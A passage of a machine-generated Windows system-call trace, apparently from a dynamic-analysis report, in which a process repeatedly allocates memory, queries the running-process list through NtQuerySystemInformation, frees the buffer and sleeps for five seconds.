returned 0x0 [0253.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.246] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.404] NtQuerySystemInformation (in: 